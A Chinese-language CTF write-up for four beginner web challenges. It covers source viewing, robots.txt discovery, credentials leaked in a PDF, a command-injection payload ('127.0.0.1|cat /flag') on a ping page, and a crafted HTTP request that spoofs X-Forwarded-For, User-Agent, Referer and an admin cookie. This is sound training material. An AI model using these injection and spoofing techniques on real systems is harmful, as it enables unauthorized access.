1.此地无银三百两
无法右键打开控制台,直接f12强开,或者在url加上:view-source:
2.my bolg
打开页面没啥路径,看下robots.txt 发现login.php
页面可以下载pdf文件,下载后打开看,可以看到账号密码,直接登录,就ok了。
3.ping 程序
简单粗暴,跟dvwa差不多。
/?ip=127.0.0.1|cat /flag
4.ez http
1.先变形
2.在post请求中加入&hhh=abc
3.他说source是那个url,对应的数据包就是referer:他的意思就是数据从哪个网页来的。
4.问是什么浏览器,对数据包的判别是哪个浏览器的是user_agent,我们俗称ua头,比如图上的我就是Google ua。所以我们按要求替换ua。
5.他说我们不是本地人,数据包中一个字段是xff头,全称呼为:X-Forwarded-For,所以我们加上这个字段。选择127.0.0.1,让他认为是本地的回环地址发的数据包。
6.他说 曲奇饼不是admin的,曲奇饼在网络安全是cookie的意思,那么我们就加上cookie字段,记住是;为间隔。,最后输出了flag。
最后这我们修改的数据包和解果。
POST / HTTP/1.1
Host: challenge.qsnctf.com:30264
X-Forwarded-For: 127.0.0.1
User-Agent:TYsecBrowser
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02p6qcnk2431ifpvi0b4elpq1;user=admin
Referer: https://sqnu-tysec.com
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 6tyctf=&hhh=abc
